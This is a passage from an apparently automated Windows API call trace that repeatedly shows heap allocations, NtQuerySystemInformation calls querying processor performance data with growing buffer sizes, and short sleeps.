ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0187.450] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0187.450] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0187.451] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0187.451] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0187.452] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0187.452] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0187.452] Sleep (dwMilliseconds=0x110) [0187.497] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0187.497] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0187.498] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0187.498] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0187.499] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0187.499] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0187.499] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0187.500] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0187.500] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0187.500] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0187.501] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0187.501] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0187.501] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0187.502] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0187.502] Sleep (dwMilliseconds=0x110) [0187.544] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0187.544] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0187.545] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0187.546] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0187.546] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0187.547] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0187.547] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0187.548] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0187.548] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0187.548] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0187.549] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0187.549] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0187.550] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0187.551] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0187.551] Sleep (dwMilliseconds=0x110) [0187.596] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0187.596] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0187.597] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0187.601] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0187.602] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0187.602] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0187.603] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0187.603] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0187.603] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0187.604] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0187.604] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0187.605] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0187.605] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0187.606] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0187.607] Sleep (dwMilliseconds=0x110) [0187.800] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0187.800] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0187.801] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0187.801] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0187.801] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0187.802] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0187.803] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0187.803] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0187.804] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0187.804] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0187.804] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0187.805] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0187.811] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0187.812] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0187.812] Sleep (dwMilliseconds=0x110) [0187.956] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0187.956] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0187.957] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0187.957] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0187.958] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0187.958] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0187.959] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0187.959] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0187.960] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0187.960] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0187.961] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0187.961] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0187.964] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0187.965] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0187.966] Sleep (dwMilliseconds=0x110) [0188.012] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0188.012] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0188.012] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0188.014] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0188.014] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0188.014] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0188.015] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0188.015] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0188.015] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0188.019] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0188.019] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0188.019] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0188.020] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0188.020] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0188.020] Sleep (dwMilliseconds=0x110) [0188.032] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0188.032] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0188.033] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0188.033] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0188.034] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0188.034] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0188.034] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0188.034] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0188.035] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0188.035] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0188.035] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0188.036] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0188.036] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0188.037] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0188.037] Sleep (dwMilliseconds=0x110) [0188.110] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0188.110] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0188.111] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0188.111] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0188.111] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0188.112] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0188.112] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0188.112] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0188.113] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0188.113] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0188.113] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0188.114] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0188.114] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0188.115] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0188.115] Sleep (dwMilliseconds=0x110) [0188.173] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0188.173] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0188.174] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0188.174] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0188.174] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0188.175] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0188.175] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0188.176] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0188.176] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0188.177] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0188.177] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0188.178] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0188.178] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0188.179] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0188.179] Sleep (dwMilliseconds=0x110) [0188.213] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0188.213] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0188.214] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0188.220] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0188.220] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0188.221] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0188.221] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0188.221] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0188.222] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0188.222] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0188.223] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0188.223] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0188.223] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0188.224] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0188.224] Sleep (dwMilliseconds=0x110) [0188.486] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0188.486] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0188.487] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0188.487] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0188.488] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0188.489] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0188.489] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0188.489] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0188.490] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0188.490] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0188.491] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0188.491] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0188.492] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0188.493] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0188.493] Sleep (dwMilliseconds=0x110) [0188.653] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0188.653] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0188.654] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0188.654] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0188.654] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0188.655] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0188.655] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0188.656] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0188.656] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0188.656] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0188.657] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0188.657] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0188.658] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0188.659] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0188.659] Sleep (dwMilliseconds=0x110) [0188.776] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0188.776] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0188.777] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0188.777] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0188.777] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0188.778] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0188.780] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0188.780] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0188.781] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0188.781] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0188.781] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0188.782] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0188.782] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0188.783] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0188.783] Sleep (dwMilliseconds=0x110) [0188.857] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0188.857] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0188.858] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0188.858] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0188.858] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0188.859] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 